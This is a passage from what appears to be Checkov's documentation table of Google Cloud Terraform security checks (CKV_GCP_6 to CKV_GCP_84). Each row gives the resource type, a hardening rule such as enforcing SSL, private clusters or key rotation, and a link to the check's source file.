with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | -| 1588 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | -| 1589 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | -| 1590 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | -| 1591 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | -| 1592 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | -| 1593 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | -| 1594 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | -| 1595 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | -| 1596 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | -| 1597 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | -| 1598 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | -| 1599 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | -| 1600 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | -| 1601 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | -| 1602 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | -| 1603 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | -| 1604 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | -| 1605 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | -| 1606 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | -| 1607 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | -| 1608 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | -| 1609 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | -| 1610 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | -| 1611 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | -| 1612 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 1613 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 1614 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 1615 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 1616 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 1617 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 1618 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 1619 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 1620 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 1621 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | -| 1622 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 1623 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 1624 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 1625 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 1626 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 1627 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 1628 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 1629 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 1630 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 1631 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | -| 1632 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | -| 1633 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 1634 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 1635 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 1636 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 1637 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 1638 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 1639 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | -| 1640 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | -| 1641 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | -| 1642 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | -| 1643 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | -| 1644 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | -| 1645 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | -| 1646 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | -| 1647 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | -| 1648 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | -| 1649 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | -| 1650 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | -| 1651 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | -| 1652 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | -| 1653 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | -| 1654 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | -| 1655 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | -| 1656 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | -| 1657 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | -| 1658 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | -| 1659 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | -| 1660 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | -| 1661 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | -| 1662 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | -| 1663 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | -| 1664 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | -| 1665 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | -| 1666 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | -| 1667 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | -| 1668 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | -| 1669 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | -| 1670 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | -| 1671 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | -| 1672 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | -| 1673 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | -| 1674 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | -| 1675 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | -| 1676 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | -| 1677 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | -| 1678 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | -| 1679 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | -| 1680 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | -| 1681 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | -| 1682 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | -| 1683 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | -| 1684 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | -| 1685 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | -| 1686 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | -| 1687 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | -| 1688 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | -| 1689 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | -| 1690 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | -| 1691 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 